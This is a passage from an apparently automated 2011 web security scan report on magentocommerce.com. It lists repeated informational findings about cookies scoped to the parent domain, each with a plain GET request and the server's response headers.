Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175837; expires=Sat, 11-Aug-2012 15:03:57 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Fleadership%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:57 GMT
Content-Length: 51387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.27. http://www.magentocommerce.com/company/media

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/media

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/media HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175832; expires=Sat, 11-Aug-2012 15:03:52 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fcompany%2Fmedia%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:53 GMT
Content-Length: 42971

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.28. http://www.magentocommerce.com/company/media/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/media/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/media/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175868; expires=Sat, 11-Aug-2012 15:04:28 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fcompany%2Fmedia%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:28 GMT
Content-Length: 42971

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.29. http://www.magentocommerce.com/company/pci-compliance

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/pci-compliance

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/pci-compliance HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:18 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175798; expires=Sat, 11-Aug-2012 15:03:18 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fcompany%2Fpci-compliance%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:18 GMT
Content-Length: 35471

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.30. http://www.magentocommerce.com/company/press-releases

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/press-releases

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/press-releases HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:40 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175819; expires=Sat, 11-Aug-2012 15:03:40 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fcompany%2Fpress-releases%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:40 GMT
Content-Length: 41130

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.31. http://www.magentocommerce.com/company/press-releases/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/press-releases/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/press-releases/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175845; expires=Sat, 11-Aug-2012 15:04:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fcompany%2Fpress-releases%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:05 GMT
Content-Length: 41130

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.32. http://www.magentocommerce.com/company/privacy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/privacy

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/privacy HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175832; expires=Sat, 11-Aug-2012 15:03:52 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A17%3A%22%2Fcompany%2Fprivacy%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:52 GMT
Content-Length: 49802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.33. http://www.magentocommerce.com/company/terms

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/terms

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/terms HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175839; expires=Sat, 11-Aug-2012 15:03:59 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fcompany%2Fterms%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:59 GMT
Content-Length: 41069

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.34. http://www.magentocommerce.com/de

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /de

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /de HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:44 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176483; expires=Sat, 11-Aug-2012 15:14:43 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fde%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:44 GMT
Content-Length: 69992

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- me
...[SNIP]...

3.35. http://www.magentocommerce.com/demo

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /demo

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /demo HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175788; expires=Sat, 11-Aug-2012 15:03:08 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A6%3A%22%2Fdemo%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:08 GMT
Content-Length: 39549

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.36. http://www.magentocommerce.com/design_guide

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /design_guide

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /design_guide HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176273; expires=Sat, 11-Aug-2012 15:11:13 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A14%3A%22%2Fdesign_guide%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:13 GMT
Content-Length: 35263

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.37. http://www.magentocommerce.com/dk

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /dk

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dk HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:16:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176568; expires=Sat, 11-Aug-2012 15:16:08 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fdk%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:16:09 GMT
Content-Length: 39933

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.38. http://www.magentocommerce.com/download

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /download

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /download HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/product/emerging-business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170943; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A1%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A2%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A3%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fservices%2Ftraining%2F%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.10.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:47:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171254; expires=Sat, 11-Aug-2012 13:47:34 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:47:34 GMT
Content-Length: 170988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.39. http://www.magentocommerce.com/download/diff

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /download/diff

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /download/diff HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176284; expires=Sat, 11-Aug-2012 15:11:24 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fdownload%2Fdiff%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:24 GMT
Content-Length: 70455

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.40. http://www.magentocommerce.com/download/get-started

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /download/get-started

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /download/get-started HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176317; expires=Sat, 11-Aug-2012 15:11:57 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fdownload%2Fget-started%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Location: http://www.magentocommerce.com/download
Content-Length: 0


3.41. http://www.magentocommerce.com/download/login_form

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /download/login_form

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /download/login_form HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176319; expires=Sat, 11-Aug-2012 15:12:00 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A21%3A%22%2Fdownload%2Flogin_form%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:00 GMT
Content-Length: 5065

<div class="login-popup" id="registerWindow">
<div class="login-popup-cont">
<div class="col2-set">
<div class="col-1">
<h3>Login, it's Easy!</h3>

...[SNIP]...

3.42. http://www.magentocommerce.com/download/release_notes

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /download/release_notes

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /download/release_notes HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
